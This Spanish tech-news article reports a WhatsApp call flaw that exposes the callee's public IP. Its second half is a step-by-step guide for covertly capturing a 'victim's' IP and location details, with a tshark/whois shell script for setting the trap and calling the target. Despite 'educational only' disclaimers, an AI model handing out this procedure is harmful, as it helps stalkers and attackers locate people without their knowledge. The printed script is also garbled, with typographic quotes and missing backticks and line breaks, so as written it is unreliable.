vulnerabilidad-WhatsApp-llamadas-saber-ip-publica

Una vulnerabilidad de WhatsApp filtra tu IP pública mediante una llamada, ¿cómo se hace?

WhatsApp es la aplicación de mensajería más usada en el mundo, incluso podríamos decir que es una de las aplicaciones que más utilizamos en nuestro día a día para comunicarnos con el resto de personas. Sin embargo, debido a la última actualización se ha detectado una vulnerabilidad en WhatsApp que podría filtrar tu IP pública. Pero, ¿qué significa esto?

El funcionamiento de las llamadas de la aplicación de mensajería es sencillo, la app de quien llama intenta conectarse a la IP pública del dispositivo que recibe la llamada. Por tanto, con un simple código puedes conocer información relevante del usuario al que se está atacando.

Las llamadas de WhatsApp filtran tu IP pública, y parece que no se solventará

Parece que con la llegada de la última versión de WhatsApp se ha creado una nueva vulnerabilidad. Está relacionado con la funcionalidad de las llamadas de voz. Durante una llamada de WhatsApp, la app de quien llama se conecta a la IP pública de quien recibe la llamada. De esta forma, se puede saber la IP pública de un usuario sin que éste sea consciente.

banner-smarphone-con-logo-WhatsApp

Pero, ¿qué se puede hacer con la IP pública y por qué deberías preocuparte? Una de las cuestiones más graves es que con esta dirección se puede rastrear la localización del dispositivo y, por consiguiente, la del usuario que lo tiene. Abre una brecha en la seguridad, no solo a nivel informático, sino que podría causar males mayores. Con esta dirección también se puede rastrear el historial de movimiento, los hábitos de navegación y realizar un mapeo directo del mismo.

El usuario de GitHub bhdresh señala que es posible realizar este ataque sin apenas conocimientos. Los comandos para explotar la vulnerabilidad de WhatsApp para saber la IP pública al realizar una llamada se encuentran en la misma plataforma, aunque el usuario advierte que deben ser usados solo con fines educativos.

La respuesta frente a la vulnerabilidad descubierta por parte de Facebook, empresa pilar dueña de WhatsApp, afirma que no califica para una recompensa al descubrir dicha vulnerabilidad.

whatsapp-smartphone-iphone

Por otro lado, la empresa afirma que dada la naturaleza peer to peer de las llamadas de WhatsApp, los usuarios solo podrían evitar tal filtración de la IP pública usando un VPN o contestando solo a contactos que conozcan. Estas palabras alentadores parecen significar que la empresa no se preocupará de solventar el problema.

Es por ello que solo debes contestar a las llamadas de contactos que conozcas, nunca a usuarios desconocidos porque podrían estar intentando localizar tu dispositivo para obtener información relevante.

¿Cómo puedo saber la IP pública realizando una llamada de WhatsApp?

El desarrollador del script afirma que debemos seguir simplemente 7 pasos para lograr saber la IP pública del usuario al que estamos llamando. Primero hay que iniciar el punto de acceso WiFi en la máquina del atacante y conectar el teléfono al SSID del atacante.

archivar-chats-WhatsApp

Tras esto, hay que iniciar un script en la máquina del atacante que ahora actúa como un router para el teléfono del atacante. El script sería el siguiente:

#!/bin/sh

filter=tshark -i eth0 -T fields -f «udp» -e ip.dst -Y «ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12» -c 100 |sort -u |xargs|sed «s/ / and ip.dst!=/g» |sed «s/^/ip.dst!=/g»

echo «Press Enter and call your target.»

read line

tshark -i eth0 -l -T fields -f «udp» -e ip.dst -Y «$filter» -Y «ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12» | while read line do whois $line > /tmp/b

filter=cat /tmp/b |xargs| egrep -iv «facebook|google»|wc -l

if [ «$filter» -gt 0 ] ; then targetinfo=cat /tmp/b| egrep -iw «OrgName:|NetName:|Country:» echo $line — $targetinfo fi done

Una vez se ha introducido el script, todo lo que debes hacer es llamar al usuario mediante la aplicación WhatsApp. De esta forma, capturas las direcciones IP del servidor a filtrar y hay que llamar a la «víctima» de la que se quiere obtener la información.

Cuando se haya establecido la conexión, se desconecta la llamada y el script revelará la dirección IP pública del objetivo. Ahora ya tienes un tu poder la información que querías, solo queda validar la IP del objetivo. Recordamos que esto solo se debe usar para uso educativo, y bajo ningún concepto para atacar a otros usuarios.

Por último, el autor del código ha subido un vídeo a YouTube mostrando cómo de fácil es saber la IP pública con esta vulnerabilidad. Tan solo es necesario realizar 7 pasos, tal y como te hemos contado.

https://www.youtube.com/watch?v=AR52CQC5kNc

Newsletter icon

¿Quieres recibir la mejor información sobre tecnología?

Disfruta de las noticias destacadas de cada semana directamente en tu correo para estar siempre informado.​

Creador y editor jefe de Techdroy. Desde pequeño me apasiona la tecnología, es una forma de vida que me gusta compartir con el mundo entero. Por ello, creé Techdroy para desarrollar mis ideas y opiniones acerca de los smartphone, ordenadores o cualquier dispositivo electrónico. ¿Te unes a nosotros?